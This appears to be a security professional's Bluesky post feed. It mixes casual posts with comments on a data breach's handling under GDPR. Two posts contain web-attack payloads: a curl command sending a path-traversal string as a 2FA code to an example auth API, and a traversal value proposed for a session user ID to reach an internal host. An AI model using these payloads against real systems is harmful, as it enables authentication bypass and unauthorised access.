Pasi Orovuo
pasi.bsky.social
Infosec person. Mostly building and breaking cloud stuff.
Silly me, it's even simpler. `curl -X POST -H 'Content-Type: application/json' --data '{"code": "../../.."}' 'https://example[.]com/api/auth/2fa'`
November 4, 2025 at 4:00 PM
`../..?x=` as the session.userId assuming it can be manipulated and api-v1-prod.example.local returns 200 at the root. /health could be another good candidate.
October 31, 2025 at 2:40 AM
I wish the note would end with "Thank you for your attention to this matter"
September 3, 2025 at 3:38 AM
Nice move and a stylish end result, compared to throwing the stuff in the trash and bringing in new Chinese-quality gear.
May 24, 2025 at 1:15 PM
Reposted by Pasi Orovuo
🎭 Now you can create hide-my-email aliases directly in the #ProtonMail web app: proton.me/blog/hide-my... 

🖥️ The Proton Mail #macOS & #Windows apps have been released, with the #Linux app becoming available in beta: proton.me/blog/proton-... 

Protect your identity with hide-my-email aliases in Proton Mail | Proton
With hide-my-email aliases, you can keep your email address private, avoid data breaches and prevent phishing or spam emails.
proton.me
April 5, 2024 at 10:36 AM
Fully agree, and should've elaborated earlier. They're effectively using regulative terminology to downplay the impact of the breach. Information leaked in the breach could subject affected people to identity theft at worst.
December 18, 2023 at 9:24 AM
I believe they are referring to the GDPR definition of sensitive data in the statement.
December 15, 2023 at 3:39 PM